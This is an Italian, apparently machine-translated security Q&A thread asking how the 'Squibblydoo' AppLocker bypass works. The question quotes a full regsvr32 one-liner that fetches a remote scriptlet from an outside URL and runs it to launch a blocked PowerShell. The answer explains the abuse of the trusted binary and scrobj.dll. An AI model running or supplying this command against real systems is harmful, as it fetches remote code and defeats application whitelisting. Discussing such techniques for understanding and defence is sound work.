Come funziona esattamente questo bypass di AppLocker? ( “Squibblydoo”)

4

Ho letto su alcuni blog di un trucco chiamato "Squibblydoo", in cui il seguente comando può ignorare AppLocker di Windows:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

Dove l'URL punta a un file di script che contiene un comando per aprire Powershell (che, nello scenario, è bloccato da AppLocker).

Tuttavia, l'ho provato su una macchina Win10 e non ha funzionato. Inoltre, sono confuso su cosa faccia esattamente. Tutto quello che so è che chiama DllUninstall da un file in un server (ma che potrebbe anche essere un file locale) e registra scrobj.dll (ma davvero non capisco la relazione qui. Che cos'è scrobj.dll facendo esattamente?) e che per qualche ragione fa eseguire lo script nel file, che può quindi aprire un'applicazione bloccata da AppLocker.

    
posta Lucas Cioffi 05.04.2018 - 20:54
fonte

1 risposta

4

Regsvr32 è un binario Microsoft affidabile.

The regsvr32 is a windows command line utility that is used to register and unregister .dll files and ActiveX controls into the registry. Casey Smith discovered that it is possible to bypass AppLocker script rules by calling the regsrv32 utility to execute a command or arbitrary code through .sct files. This utility has many benefits since it is a trusted Microsoft binary, proxy aware, it supports TLS encryption, it follows redirects and it doesn’t leave any trace on the disk.

Così come un Applocker binario firmato da Microsoft gli permette di eseguire. Il codice nel file SCT (credo che questo non debba essere un SCT) viene eseguito quando si annulla la registrazione usando lo scrobj.dll

Scrobj.dll è usato per registrare e annullare la registrazione degli oggetti COM, che è ciò che è necessario per attivare questo come SCT è un servlet di oggetti COM doo-daa.

    
risposta data 05.04.2018 - 23:48
fonte

Leggi altre domande sui tag